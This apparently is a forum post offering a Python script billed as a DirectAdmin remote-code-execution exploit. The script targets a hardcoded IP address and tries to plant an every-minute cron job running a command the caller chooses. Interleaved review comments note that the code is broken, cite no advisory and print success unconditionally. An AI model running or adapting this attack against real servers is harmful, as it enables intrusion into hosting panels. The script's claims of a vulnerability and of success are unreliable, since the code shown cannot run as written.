DirectAdmin RCE 1.5
Код:
import requests
import sys
import threading
# Argument check: the script expects two positional arguments and exits with a
# usage line when fewer are given.
if len(sys.argv) < 3:
print("Usage: python %s <target_url> <command>" % sys.argv[0])
sys.exit(1)
# NOTE(review): the usage text advertises <target_url>, but sys.argv[1] is never
# read; the destination is a literal address baked into the script.
target_url = "https://208.85.2.148:2222"
command = sys.argv[2]
# Plain GET of the panel's cron-job page; the response body is dumped to stdout.
# No session cookie, credentials or login step appear anywhere in this listing.
response = requests.get(f"{target_url}/CMD_CRON_JOBS")
print(response.text)
# Form fields for a cron-job "create" submission. All five schedule fields are
# "*", which in cron syntax means every minute. "command" is the fixed string
# "command;", while the caller-supplied text goes into "command_exec".
# NOTE(review): nothing on the page shows that the panel honours
# "command_type"/"command_exec", and the page cites no CVE or advisory, so the
# "RCE" claim in the title is unverified from this listing.
params = {
"action": "create",
"minute": "*",
"hour": "*",
"dayofmonth": "*",
"month": "*",
"dayofweek": "*",
"command": "command;",
"command_type": "exec",
"command_exec": command
}
# The form is POSTed to the same endpoint, again with no authentication material.
# Defender view: judging by the endpoint name and action=create, this is the
# panel's ordinary cron-job form, so the signals worth reviewing are POSTs to
# /CMD_CRON_JOBS from unexpected clients and crontab entries the account owner
# did not add.
response = requests.post(f"{target_url}/CMD_CRON_JOBS", data=params)
print(response.text)
# exploit(target_url, command): repeats the module-level GET and POST against
# {target_url}/CMD_CRON_JOBS, printing each response body. Any exception is
# printed and the process exits with status 1.
# NOTE(review): despite the name, the body only submits a cron-job form without
# credentials; the listing does not show what flaw, if any, would make the
# panel accept it.
def exploit(target_url, command):
try:
# Fetch the cron-job page and print whatever the server returns.
response = requests.get(f"{target_url}/CMD_CRON_JOBS")
print(response.text)
# Same form as at module level: every schedule field is "*", "command" is the
# fixed string "command;", and the caller's text is placed in "command_exec".
params = {
"action": "create",
"minute": "*",
"hour": "*",
"dayofmonth": "*",
"month": "*",
"dayofweek": "*",
"command": "command;",
"command_type": "exec",
"command_exec": command
}
# Submit the form; the status code is never checked, so a login redirect or an
# error page would be printed just like a success.
response = requests.post(f"{target_url}/CMD_CRON_JOBS", data=params)
print(response.text)
# Broad catch: every failure (network, TLS, anything else) ends the process here.
except Exception as e:
print("An error occurred: %s" % e)
sys.exit(1)
# Thin wrapper that forwards its arguments to exploit().
def threading_function(target_url, command):
exploit(target_url, command)
# NOTE(review): indentation was lost on this page, so it is unclear whether the
# remaining lines belong to threading_function or to module level. Either way
# they do not work as written: threading.main_thread() accepts no arguments, so
# the first call raises TypeError, and the threading module has no module-level
# join(). Neither exploit() nor threading_function() is called in the visible
# listing, and the final message is printed unconditionally rather than derived
# from any server response, so it is not evidence that anything happened.
threading.main_thread(10).start()
threading.join()
print("Exploit completed successfully!")